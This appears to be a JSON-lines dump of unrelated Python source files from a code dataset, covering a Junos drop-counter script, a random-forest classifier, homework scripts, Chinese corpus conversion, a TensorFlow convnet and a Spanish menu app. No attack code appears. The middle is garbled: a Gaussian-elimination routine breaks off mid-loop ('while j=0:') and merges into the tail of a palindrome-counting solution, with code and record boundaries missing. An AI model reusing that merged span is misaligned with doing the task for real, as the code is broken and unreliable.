argv[1] == \"uploadf\" or argv[1] == \"upload\":\n print(upload(argv[2], url=False))\n elif argv[1] == \"uploadu\" or argv[1] == \"url\":\n print(upload(argv[2]))\n elif argv[1] == \"info\":\n print(info(argv[2]))\n elif argv[1] == \"infol\":\n print(info_list(argv[2].split(\",\")))\n elif argv[1] == \"exists\":\n print(exists(argv[2]))\n elif argv[1] == \"delete\":\n print(delete(argv[2]))\n elif argv[1] == \"status\":\n print(status(argv[2]))\n else:\n print(\"Unsupported function.\")\n else:\n print(\"Usage: %s \" % argv[0])\n print(\"Functions:\")\n print(\"upload: filename uploadf: filename uploadu: url\")\n print(\"url: url info: hash infol: comma-separated hash list\")\n print(\"exists: hash delete: hash status: hash\")\n print(\"by Steven Smith (blha303) 2013\")\n print(\"MIT license\")\n print(\"Support: https://gist.github.com/blha303/6239248 or mcrush@blha303.com.au\")\n","sub_path":"imgrush.py","file_name":"imgrush.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102976331","text":"import pandas as pd\nfrom 
sklearn.preprocessing import OneHotEncoder\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\n###################\n# import the data #\n###################\n\ndata = pd.read_csv('/Users/jeremylewallen/Desktop/expedia/data/train_csv_50000.csv')\n\n#############\n# x-columns #\n#############\n\nhotel_market = data['hotel_market']\nuser_location_region = data['user_location_region']\n\n############\n# y-column #\n############\n\nhotel_cluster = data['hotel_cluster']\n\ndef one_hot_encode(column):\n\n one_hot = OneHotEncoder()\n\n hotel_market = column.values\n\n hotel_market = hotel_market.reshape((-1,1))\n\n hotel_market_one_hot = one_hot.fit_transform(hotel_market)\n\n hotel_market_one_hot = hotel_market_one_hot.todense()\n\n return hotel_market_one_hot\n\n##############################\n# one hot encode the columns #\n##############################\n\nhotel_market_encoded = one_hot_encode(hotel_market)\n\nuser_location_region_encoded = one_hot_encode(user_location_region)\n\nhotel_cluster_encoded = one_hot_encode(hotel_cluster)\n\n\n#not sure\n\nhotel_cluster_slice = hotel_cluster_encoded[:,0]\n\n#########################\n# combine the x columns #\n#########################\n\ntrain_data = np.hstack((hotel_market_encoded, user_location_region_encoded))\n\n##############################################\n# split the data into training and test data #\n##############################################\n\nx_train, x_test, y_train, y_test = train_test_split(train_data, hotel_cluster_slice)\n\n# flatten the (n, 1) matrix columns into 1-D label arrays\ny_train = np.asarray(y_train).ravel()\ny_test = np.asarray(y_test).ravel()\n\n####################\n## train the data ##\n####################\n\nrandom_forest = RandomForestClassifier(class_weight='balanced')\n\nrandom_forest.fit(x_train, y_train)\n\n#############################\n## score the random forest ##\n#############################\n\npredictions = random_forest.predict(x_test)\n\nprint(classification_report(y_test, predictions))","sub_path":"random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329929245","text":"#Jay Wilson, Wushu(Wilson) Ouyang\n\n# using netmiko to show how flexible HB is. Most JNPR people would use PYEZ\nfrom netmiko import ConnectHandler\nfrom junossecure.junos_secure import junos_decode\n\n# define a routine to connect to a device and issue a command to JUNOS\ndef get_junos_command(device, command):\n net_connect = ConnectHandler(**device)\n output = net_connect.send_command(command)\n net_connect.disconnect()\n return output\n\n# Main routine for HB to run when called via a rule\ndef run():\n\n # get the device specifics from HB for the device that is being queried\n # and create a python dictionary with the information that will be used\n # for establishing a NETCONF session\n host = __pillar__[\"proxy\"][\"host\"]\n user= __pillar__[\"proxy\"][\"username\"]\n pwd = junos_decode(__pillar__[\"proxy\"][\"encoded_password\"])\n device = {\n \"device_type\": \"juniper_junos\",\n \"host\": host,\n \"username\": user,\n \"password\": pwd,\n }\n
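    # Example: get_junos_command(device, \"show version\") would return that\n    # command's raw CLI output for this device as a string.\n\n    # dictionary of what each BCM counter means. 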
Can be used in trigger messages\n # to explain what the traffic types the drop(s) are\n meaning = {\n 'RDBGC0': '(All Received Drop)',\n 'RDBGC1': '(Filter Block Drop)',\n 'RDBGC2': '(Multicast Drop)',\n 'RDBGC3': '(VLAN Drop)',\n 'RDBGC4': '(Policy Discard Drop)',\n 'RDBGC5': '(Parity Error Drop)',\n 'RDBGC6': '(VLAN Field Processor Drop)',\n 'RDBGC7': '(L2/L3 Lookup DST_DISCARD Drop)',\n 'RDBGC8': '(11 other error Drops)',\n 'TDBGC1': '(IPv6 L3 and IPMC Aged and Drop)',\n 'TDBGC3': '(All Transmit Drop)',\n 'TDBGC5': '(IPv4 L3 and IPMC Aged and Drop)',\n 'TDBGC6': '(L2 Multicast Drop)',\n 'TDBGC7': '(Aged Drop)',\n 'TDBGC8': '(STP not in FWD state Drop)',\n 'TDBGC9': '(VXLT Translate Drop)',\n 'TDBGC10': '(Invalid VLAN Drop)',\n 'TDBGC11': '(6 other error Drops)',\n }\n notdrops = ['TDBGC0', 'TDBGC2', 'TDBGC4']\n\n # commands that will be issued to a JUNOS device to retrieve specific VTP data\n command1 = 'request routing-engine execute command \"/usr/sbin/cprod -A fpc0 -c \\'show dcbc ifd all\\' | awk \\'NR > 3 {print $4}\\' | xargs -I [] /usr/sbin/cprod -A fpc0 -c \\'set dcbc bc \\\\\"show c []\\\\\"\\' | awk \\'/RDBGC0/ {print $0}; /TDBGC/ {print $0}\\'\"'\n command2 = 'request routing-engine execute command \"/usr/sbin/cprod -A fpc0 -c \\'show dcbc ifd all\\'\"'\n\n # issue \"command1\" to the specified JUNOS device\n output1 = get_junos_command(device,command1)\n #print(result)\n # NETCONF streams the data. split it into lines based on end of line character\n output1 = output1.split(\"\\n\")\n output1_list = []\n for line in output1:\n if line:\n line = line.split()\n # the counter is in the last column of output and it is a string\n value = line[3]\n # remove the + sign at the start of the string and any commas\n value = value[1:].replace(\",\", \"\")\n # convert the string to an integre to be stored by HB\n value = int(value)\n #print(\"value\", value)\n # key is the counter name as listed in the meaning dictionary + a .\n # we need to split out the counter name from the vty-port-index\n key = line[0]\n name = line[0].split(\".\")[0]\n #print(\"name\", name)\n port = line[0].split(\".\")[1]\n #print(\"port\", port)\n why = meaning.get(name)\n if notdrops.count(name) == 0 :\n output1_list.append({\"tags\": {\"key\": key}, \"fields\": {\"name\": name, \"port\":port, \"value\":value, \"why\":why}})\n\n # issue \"command2\" to the specified JUNOS device\n output2 = get_junos_command(device,command2)\n output2 = output2.split(\"\\n\")\n # remove the first 3 lines because they are headers\n output2_new = output2[4:]\n\n ifd_port_list = []\n for item in output2_new:\n if item:\n item = item.split()\n ifd = item[0]\n port = item[4]\n ifd_port_list.append({\"ifd\":ifd, \"port\":port})\n\n # combine the output from the 2 commands based on the port number\n for item in output1_list:\n for ifd_port in ifd_port_list:\n if ifd_port[\"port\"] == item[\"fields\"][\"port\"]:\n item[\"fields\"][\"ifd\"] = ifd_port[\"ifd\"]\n\n #for item in output1_list: print(item)\n return output1_list\n","sub_path":"helper-files/pfe_port_value.py","file_name":"pfe_port_value.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"185009203","text":"# CS 5001\n# Fall 2019\n# HW1 - Data Types and Arithmetic Operations\n\n# TEST CASE 1\n# distance = 3000m, pool size = 35m, time = 45:44 =>\n# 85 laps, pace per 100m = 1:31, avg. 
speed = 3.9 km/hr\n# TEST CASE 2\n# distance = 800m, pool size = 20, time = 19:30 =>\n# 40 laps, pace per 100m = 2:26, avg. speed = 2.5 km/hr\n# TEST CASE 3\n# distance = 1400m, pool size = 60, time = 31:19 =>\n# 23 laps, pace per 100m = 2:14, avg. speed = 2.7 km/hr\n\n# PURPOSE\n# Returns the number of laps swum.\n# SIGNATURE\n# calc_laps(num_distance, num_size) :: Int, Int => Float\n# EXAMPLES\n# calc_laps(1400, 60) => 23\n# calc_laps(800, 20) => 40\n\n\ndef calc_laps(num_distance, num_size):\n return num_distance // num_size\n\n\n# PURPOSE\n# Returns the pace of the swimmer per 100m in minutes.\n# SIGNATURE\n# calc_pace(num_distance, num_minutes, num_seconds) ::\n# Integer, Integer, Integer => Float\n# EXAMPLES\n# calc_pace(3000, 45 , 44) => 1.0\n# calc_pace(800, 19, 30) => 2.0\n\n\ndef calc_pace(num_distance, num_minutes, num_seconds):\n minutes_in_seconds = num_minutes * 60\n total_seconds = minutes_in_seconds + num_seconds\n num_of_100m_in_distance = num_distance / 100\n pace_in_seconds = total_seconds // num_of_100m_in_distance\n pace_minutes = pace_in_seconds // 60\n return pace_minutes\n\n\n# PURPOSE\n# Returns the pace of the swimmer per 100m in seconds.\n# SIGNATURE\n# calc_pace_in_sec(num_distance, num_minutes, num_seconds) ::\n# Integer, Integer, Integer => Float\n# EXAMPLES\n# calc_pace_in_sec(1400, 31 , 19) => 14.0\n# calc_pace_in_sec(800, 19, 30) => 26.0\n\n\ndef calc_pace_in_sec(num_distance, num_minutes, num_seconds):\n minutes_in_seconds = num_minutes * 60\n total_seconds = minutes_in_seconds + num_seconds\n num_of_100m_in_distance = num_distance / 100\n pace_in_seconds = total_seconds // num_of_100m_in_distance\n pace_minutes = pace_in_seconds // 60\n pace_minutes_convert = pace_minutes * 60\n seconds = pace_in_seconds - pace_minutes_convert\n return seconds\n\n\n# PURPOSE\n# Returns the speed in kilometers per hour.\n# SIGNATURE\n# calc_speed(num_distance, num_minutes, num_seconds) ::\n# Integer, Integer, Integer => Float\n# EXAMPLES\n# calc_speed(3000, 45 , 44) => 3.9\n# calc_speed(800, 19, 30) => 2.5\n\n\ndef calc_speed(num_distance, num_minutes, num_seconds):\n full_min = round((num_seconds / 60), 1)\n min_in_hour = num_minutes + full_min\n rem_min_in_hour = 60 - min_in_hour\n percent_rem_min = rem_min_in_hour / min_in_hour\n km_per_hour = (((percent_rem_min * num_distance) + num_distance) / 1000)\n rounded_km = round(km_per_hour, 1)\n return rounded_km\n\n\n# PURPOSE\n# Formats the pace line that is shown to the user.\n# SIGNATURE\n# pace_line(pace_min, pace_sec) :: Int, Int => Str\n# EXAMPLES\n# pace_line(1, 31) => \"Your pace per 100m was 1:31.\"\n# pace_line(2, 26) => \"Your pace per 100m was 2:26.\"\n\n\ndef pace_line(pace_min, pace_sec):\n # zero-pad the seconds so e.g. 1 minute 5 seconds renders as 1:05, not 1:5\n return \"Your pace per 100m was {}:{:02d}.\".format(pace_min, pace_sec)\n
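\n# Worked example (TEST CASE 1): calc_laps(3000, 35) -> 85,\n# calc_pace(3000, 45, 44) -> 1.0, calc_pace_in_sec(3000, 45, 44) -> 31.0,\n# so pace_line(1, 31) -> \"Your pace per 100m was 1:31.\"\n\n\ndef main():\n distance = int(input(\"How many meters did you swim? \"))\n size = int(input(\"How big was the pool in meters? 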
\"))\n print(\"How long did it take you, in minutes and seconds?\")\n minutes = int(input(\"Enter the number of minutes first: \"))\n seconds = int(input(\"Now enter the seconds: \"))\n\n laps = calc_laps(distance, size)\n pace_min = int(calc_pace(distance, minutes, seconds))\n pace_sec = int(calc_pace_in_sec(distance, minutes, seconds))\n avg_speed = calc_speed(distance, minutes, seconds)\n\n print(\"You swam\", laps, \"laps.\")\n print(pace_line(pace_min, pace_sec))\n print(\"Your average speed was\", avg_speed, \"km/hr.\")\n\n\nmain()\n","sub_path":"Fall 2019/HW1/swimstats.py","file_name":"swimstats.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"271922020","text":"cities = {\n 'New York City': {\n 'country': 'usa',\n 'population': 8_623_000,\n 'fact': 'New York City is made up of five boroughs: Manhattan, The Bronx, Queens, Brooklyn, and Staten Island'\n },\n 'Tokyo': {\n 'country': 'japan',\n 'population': 9_273_000,\n 'fact': 'Vending machines are available in Tokyo at every 12 meter distance'\n },\n 'Mumbai': {\n 'country': 'india',\n 'population': 18_410_000,\n 'fact': 'There is only 1.1 square metres of open space for people living in Mumbai'\n }\n}\nfor city, city_info in cities.items():\n print(f'{city}:')\n country = city_info['country']\n population = city_info['population']\n fact = city_info['fact']\n if city_info['country'] == 'usa':\n print(f'\\tCountry: {country.upper()}')\n else:\n print(f'\\tCountry: {country.title()}')\n print(f'\\tPopulation: {population}')\n print(f'\\tInteresting fact: {fact}.')\n print('\\n')\n","sub_path":"basics/dictionaries/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"613098881","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 21 18:18:11 2019\n\n@author: AndresArciniegas\n\"\"\"\n\nfrom hanziconv import HanziConv\n\n# AS (Traditional Chinese)\n# CITYU (Traditional Chinese)\n# MSR (Simplified Chinese)\n# PKU (Simplified Chinese)\n\n# The task is to convert all of them to simplified chinese. So, AS and CITYU must be processed\n\n#%%\ndef reorder_elements_in_list_by_words(sentences, length=50): \n \"\"\"\n Reordering (reshaping) the words in the sentences allows to reduce the number of them, avoiding useless computations when padding.\n \n :param sentences: is a list of strings to be reordered by words\n :param length: size of each new sentence (no. 
of words).\n \"\"\"\n sents_single = ' '.join(sentences) #The space is necessary to avoid involuntary merging of words\n sents_simp_split = sents_single.split(' ')\n sents_reordered = []\n num_of_elems = round(len(sents_simp_split)/length)\n for i in range(num_of_elems):\n newsent = sents_simp_split[i*length:(i+1)*length]\n sents_reordered.append(' '.join(newsent))\n print('\\n[INFO] Number of sentences in original file: ', len(sentences))\n print('[INFO] Number of sentences in reordered file: ', len(sents_reordered))\n print(\"[INFO] Percentage of length with respect to input:\", round(len(sents_reordered)/len(sentences)*100,2),'%')\n\n return sents_reordered \n \ndef reorder_elements_in_list_by_chars(sentences, length=100):\n \"\"\"\n Reordering (reshaping) the words in the sentences allows to reduce the number of them, avoiding useless computations when padding.\n \n :param sentences: is a list of strings to be reordered by characters\n :param length: approximate size of each new sentence (no. of characters).\n \"\"\"\n sents_single = ' '.join(sentences)\n sents_r = []\n spaces = -1\n p0 = 0; pos_buf = 0\n for pos,char in enumerate(sents_single):\n if char == \" \":\n spaces += 1 # Spaces accumulator\n #print(sent[p0:pos], p0, pos, pos-p0, maxlen + spaces, pos_buf)\n #if p0==0: \n if pos-p0 > length + spaces:\n #print(\"taken!\")\n # Take the range of characters up to the previous space position (not the\n # current one), so each chunk's length stays below the 'length' parameter\n sents_r.append(sents_single[p0:pos_buf]) \n p0 = pos_buf+1; \n spaces=0;\n pos_buf = pos \n if pos == len(sents_single)-1: #Include the last sentence, no matter how long it is\n sents_r.append(sents_single[p0:pos+1]) \n print('\\n[INFO] Number of sentences in original file: ', len(sentences))\n print('[INFO] Number of sentences in reordered file: ', len(sents_r))\n print(\"[INFO] Percentage of length with respect to input:\", round(len(sents_r)/len(sentences)*100,2),'%')\n # lsentsr = [len(x.replace(' ','')) for x in sents_r]\n# print(lsentsr)\n\n return sents_r \n \ndef save_into_file(lines, file_path):\n with open(file_path, 'w', encoding='utf8') as file:\n file.writelines('\\n'.join(lines))\n\ndef to_simplified_chinese(sentences):\n return [HanziConv.toSimplified(s) for s in sentences]\n\ndef file_to_simplified_chinese(filePath,save=True,save_file=\"\"):\n with open(filePath, encoding='utf8') as file:\n sents = file.read().splitlines()\n sents = [x.replace(' ',' ').replace('\\u3000' ,' ') for x in sents]\n sents_simp = to_simplified_chinese(sents) \n return sents, sents_simp\n\n#%%\n\n#%%\nlength = 30 \n\n#%%\n# ----------------------------------------------\n################# ALL MERGED ##################\n# ----------------------------------------------\nprint(\"[INFO] Processing ALL Datasets merged (Test)\")\nfile_path = \"../dataset/icwb2-data/gold/ALL_test_gold_simp_reordered_shuf.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/as_test_gold_simp_reordered_30.utf8\")\n#%%\nprint(\"[INFO] Processing ALL Datasets merged (Train)\")\nfile_path = \"../dataset/icwb2-data/training/ALL_training_simp_reordered_shuf.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder, \"../dataset/icwb2-data/training/ALL_training_simp_reordered_shuf_30.utf8\")\n \n#%%\n# 
----------------------------------------------\n###################### AS ######################\n# ----------------------------------------------\nprint(\"[INFO] Processing AS Dataset (Gold)\")\nfile_path = \"../dataset/icwb2-data/gold/as_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/as_test_gold_simp_reordered.utf8\")\n#save_into_file(sents_simp , \"../dataset/icwb2-data/gold/as_test_gold_simp.utf8\")\n\nprint(\"[INFO] Processing AS Dataset (Training)\")\nfile_path = \"../dataset/icwb2-data/training/as_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\n#save_into_file(sents_reorder , \"../dataset/icwb2-data/training/as_training_simp_reordered.utf8\")\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/as_training_simp_reordered.utf8\")\n#save_into_file(sents_simp , \"../dataset/icwb2-data/training/as_training_simp.utf8\")\n\n#%%\n# ----------------------------------------------\n##################### CITYU ####################\n# ----------------------------------------------\nprint(\"[INFO] Processing CITYU Dataset (Gold)\")\n\nfile_path = \"../dataset/icwb2-data/gold/cityu_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/cityu_test_gold_simp_reordered.utf8\")\n\nprint(\"[INFO] Processing CITYU Dataset (Training)\")\n\nfile_path = \"../dataset/icwb2-data/training/cityu_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/cityu_training_simp_reordered.utf8\")\n\n#%%\n# Reorder also the ones that were already in simplified chinese\n# If processed by the simplified-chinese converted, they remain the same\n\n# ----------------------------------------------\n##################### MSR ######################\n# ----------------------------------------------\nprint(\"[INFO] Processing MSR Dataset (Training)\")\n\nfile_path = \"../dataset/icwb2-data/training/msr_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/msr_training_simp_reordered.utf8\")\n\nprint(\"[INFO] Processing MSR Dataset (Gold)\")\n\nfile_path = \"../dataset/icwb2-data/gold/msr_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/msr_test_gold_simp_reordered.utf8\")\n\n#%%\n# ----------------------------------------------\n##################### PKU ######################\n# ----------------------------------------------\nprint(\"[INFO] Processing PKU Dataset (Training)\")\n\nfile_path = \"../dataset/icwb2-data/training/pku_training.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/training/pku_training_simp_reordered.utf8\")\n\nprint(\"[INFO] Processing PKU Dataset (Gold)\")\n\nfile_path = 
\"../dataset/icwb2-data/gold/pku_test_gold.utf8\"\nsents, sents_simp = file_to_simplified_chinese(file_path)\nsents_reorder = reorder_elements_in_list_by_chars(sents_simp, length)\nsave_into_file(sents_reorder , \"../dataset/icwb2-data/gold/pku_test_gold_simp_reordered.utf8\")\n\n\n ","sub_path":"resources/FilesUsedForTraining/HanziAndDatasetConversion.py","file_name":"HanziAndDatasetConversion.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"331422751","text":"\"\"\"\nCP1404/CP5632 - Practical\nRandom word generator - based on format of words\n\nAnother way to get just consonants would be to use string.ascii_lowercase\n(all letters) and remove the vowels.\n\"\"\"\nimport random as r\n\nMAX_LENGTH = 8\nMIN_LENGTH = 3\nVOWELS = \"aeiou\"\nCONSONANTS = \"bcdfghjklmnpqrstvwxyz\"\n\nlength = r.randint(MIN_LENGTH, MAX_LENGTH)\nword_format = ''\nfor x in range(length):\n word_format += r.choice(['c', 'v'])\n# word_format = \"ccvcvvc\"\n# word_format = input(\"Word Format: \")\nword = \"\"\nfor kind in word_format:\n if kind == \"c\":\n word += r.choice(CONSONANTS)\n else:\n word += r.choice(VOWELS)\n\nprint(word)\n","sub_path":"prac_02/word_generator.py","file_name":"word_generator.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"166827563","text":"from setuptools import setup\n\nVERSION = \"0.0.1dev0\"\n\nsetup(\n name='mvp de ml-practico',\n version=VERSION,\n description='main etl for machine learning model',\n author='',\n author_email='',\n classifiers=[\n 'Programming Language :: Python :: 3.7.0',\n ],\n packages=['mlp_mvp'],\n install_requires=['scikit-learn==0.23.0']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"34305271","text":"import time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef grid_1d_gp(r,n):\r\n x = [0 for i in range(n+1)]\r\n rng=(0,1)\r\n #gp sum\r\n sum=0\r\n for i in range(n):\r\n sum = sum + pow(r,i)\r\n x0 = (rng[1]-rng[0])/sum\r\n x[0] = rng[0]\r\n\r\n for i in range(n):\r\n x[i+1] = x[i] + x0*pow(r,i)\r\n\r\n return(x)\r\n\r\ndef matrix_form(x,bc):\r\n\r\n p=1\r\n u=1\r\n t=0.02\r\n\r\n n = len(x)-2\r\n # print(n)\r\n a = [[0 for i in range(n)] for j in range(n)]\r\n #rhs vector\r\n b = [0 for i in range(n)]\r\n\r\n for i in range(1,n+1):\r\n gamma = ( (-p*u)/(x[i+1]-x[i-1]) ) - ( (2*t)/((x[i]-x[i-1])*(x[i+1]-x[i-1])) )\r\n alpha = ( (2*t)/((x[i+1]-x[i-1])*(x[i+1]-x[i])) ) + ( (2*t)/((x[i+1]-x[i-1])*(x[i]-x[i-1])) )\r\n beta = ( (p*u)/(x[i+1]-x[i-1]) ) - ( (2*t)/((x[i+1]-x[i])*(x[i+1]-x[i-1])) )\r\n\r\n j=i-1\r\n if(j is 0):\r\n a[0][0]=alpha\r\n a[0][1] =beta\r\n b[0] = 0 - (gamma*bc[0])\r\n elif(j is n-1):\r\n a[n-1][n-1]=alpha\r\n a[n-1][n-2]=gamma\r\n b[n-1] = 0 - (beta*bc[1])\r\n else:\r\n a[j][j-1] = gamma\r\n a[j][j] = alpha\r\n a[j][j+1] = beta\r\n\r\n return(a,b)\r\n\r\ndef gauss_elm(A,B):\r\n n= len(B)\r\n # step 1: Gaussian elimination.\r\n i=0\r\n while i < n:\r\n # pivots\r\n pivot = A[i][i]\r\n j=i+1\r\n while j=0:\r\n sum = 0\r\n k=i+1\r\n while k= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n count += 1\n return count\n\n def countSubstrings(self, s: str) -> int:\n count = 0\n\n for i in range(len(s)):\n count = self.expand(s, i, i, count)\n count = self.expand(s, i, i + 1, count)\n\n return 
count\n\n\n\"\"\"Dynamic programming with a DP table\"\"\"\n# dp[i][j] is True iff s[i..j] is a palindrome\nclass Solution:\n def countSubstrings(self, s: str) -> int:\n dp = [[False] * len(s) for _ in range(len(s))]\n # initialize the base case: the diagonal (single characters) is True\n for i in range(len(s)):\n dp[i][i] = True\n\n for i in range(len(s), -1, -1):\n for j in range(i + 1, len(s)):\n if s[i] == s[j]:\n if j - i == 1:\n # special case: two adjacent equal characters\n dp[i][j] = True\n else:\n dp[i][j] = dp[i + 1][j - 1]\n\n res = 0\n for dp_i in dp:\n res += dp_i.count(True)\n\n return res\n\n\ns = 'aaa'\n","sub_path":"动态规划/二维数组/647-回文子串.py","file_name":"647-回文子串.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358255553","text":"import tensorflow as tf\n# from tensorflow.contrib.layers.python import layers as tf_layers\nimport numpy as np\nfrom utils import count_params_in_scope\nfrom data import tf_standardize\n\n# 5-layer convnet: from cbfinn's maml implementation\n\n\nclass ConvNet():\n\n def __init__(self, args):\n\n self.args = args\n self.channels = 3\n self.dim_hidden = [16, 32, 32, 64, 64]\n # self.dim_hidden = [16, 16, 16, 32, 32]\n self.dim_output = 10\n self.img_size = 32\n self.norm = 'None'\n self.max_pool = True\n self.floattype = tf.float64 if self.args.bit64 else tf.float32\n self.inttype = tf.int64 if self.args.bit64 else tf.int32\n\n def construct_weights(self):\n weights = {}\n\n conv_initializer = tf.contrib.layers.xavier_initializer_conv2d(dtype=self.floattype)\n fc_initializer = tf.contrib.layers.xavier_initializer(dtype=self.floattype)\n k = 3\n\n for i in range(len(self.dim_hidden)):\n previous = self.channels if i == 0 else self.dim_hidden[i - 1]\n weights['conv' + str(i + 1)] = tf.get_variable('conv' + str(i + 1), [k, k, previous,\n self.dim_hidden[i]], initializer=conv_initializer, dtype=self.floattype)\n weights['b' + str(i + 1)] = tf.Variable(tf.zeros([self.dim_hidden[i]],\n dtype=self.floattype), name='b' + str(i + 1))\n\n # assumes max pooling\n weights['w6'] = tf.get_variable('w6', [self.dim_hidden[-1], self.dim_output],\n initializer=fc_initializer, dtype=self.floattype)\n weights['b6'] = tf.Variable(tf.zeros([self.dim_output], dtype=self.floattype), name='b6')\n\n return weights\n\n def forward(self, inp, weights, reuse=False, scope=''):\n # reuse is for the normalization parameters.\n\n datamean, datastd = np.array((0.4914, 0.4822, 0.4465)), np.array((0.2023, 0.1994, 0.2010))\n inp = tf_standardize(inp, datamean, datastd)\n hidden1 = self.conv_block(inp, weights['conv1'], weights['b1'], reuse, scope + '0')\n hidden2 = self.conv_block(hidden1, weights['conv2'], weights['b2'], reuse, scope + '1')\n hidden3 = self.conv_block(hidden2, weights['conv3'], weights['b3'], reuse, scope + '2')\n hidden4 = self.conv_block(hidden3, weights['conv4'], weights['b4'], reuse, scope + '3')\n hidden5 = self.conv_block(hidden4, weights['conv5'], weights['b5'], reuse, scope + '4')\n\n hidden5 = tf.reshape(hidden5, [-1, np.prod([int(dim) for dim in hidden5.get_shape()[1:]])])\n logits = tf.matmul(hidden5, weights['w6']) + weights['b6']\n\n # nparam = count_params_in_scope()\n return logits, hidden5\n\n # Network helpers\n\n
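    # conv_block keeps the conv at stride 1 and lets the 2x2/stride-2 max-pool\n    # below halve the spatial dims when max_pool is set; otherwise the conv\n    # itself is strided.\n    def conv_block(self, inp, cweight, bweight, reuse, scope, activation=tf.nn.relu, max_pool_pad='VALID', residual=False):\n        \"\"\"Perform, conv, batch norm, nonlinearity, and max pool.\"\"\"\n        stride, no_stride = [1, 2, 2, 1], [1, 1, 1, 1]\n\n        if self.max_pool:\n            conv_output = tf.nn.conv2d(inp, cweight, no_stride, 'SAME') + bweight\n        else:\n            conv_output = 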
tf.nn.conv2d(inp, cweight, stride, 'SAME') + bweight\n normed = self.normalize(conv_output, activation, reuse, scope)\n if self.max_pool:\n normed = tf.nn.max_pool(normed, stride, stride, max_pool_pad)\n return normed\n\n def normalize(self, inp, activation, reuse, scope):\n if self.norm == 'batch_norm':\n return tf_layers.batch_norm(inp, activation_fn=activation, reuse=reuse, scope=scope)\n elif self.norm == 'layer_norm':\n return tf_layers.layer_norm(inp, activation_fn=activation, reuse=reuse, scope=scope)\n elif self.norm == 'None':\n if activation is not None:\n return activation(inp)\n else:\n return inp\n","sub_path":"learners_compat/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519510174","text":"from prettytable import PrettyTable\nfrom Core.Core_databaseX import DatabaseX\nfrom Logic.Logic_ExperienciasLogic import ExperienciaLogic\nfrom Views.View_Facturas import facturasBE\nfrom Logic.Logic_TematicaLogic import TematicaLogic\nfrom Views.View_Tematica import TematicaBE\n\ndatabase = DatabaseX()\ndbexperiencia = ExperienciaLogic()\nbefacturas = facturasBE()\ndbtematica = TematicaLogic()\nbetematica = TematicaBE()\n\ndef ExperienciasPresenciales(cliente):\n result = dbexperiencia.buscarExperienciasPresenciales()\n\n table = PrettyTable()\n table1 = PrettyTable()\n\n table.field_names = [\"idExp\", \"NombreAnfitrion\", \"TituloExperiencia\", \"TipoDeExperiencia\",\n \"Ubicacion\", \"Descripcion\", \"Idioma\"]\n\n table1.field_names = [\"idExp\", \"PublicoObjetivo\", \"Organizacion\", \"AnfitrionExp\",\n \"ElementosANecesitar\", \"Precio\", \"Fecha\", \"IdTematica\"]\n\n for experiencia in result:\n table.add_row([\n experiencia.id,\n experiencia.host,\n experiencia.ExperienceTitle,\n experiencia.TypeExperience,\n experiencia.Location,\n experiencia.Descrption,\n experiencia.Idiom\n ])\n table1.add_row([\n experiencia.id,\n experiencia.PublicObject,\n experiencia.Organization,\n experiencia.hostExperience,\n experiencia.NeedElements,\n experiencia.precio,\n experiencia.fecha,\n experiencia.tematica\n ])\n\n print(table)\n table.clear()\n print(table1)\n table1.clear()\n\n option = 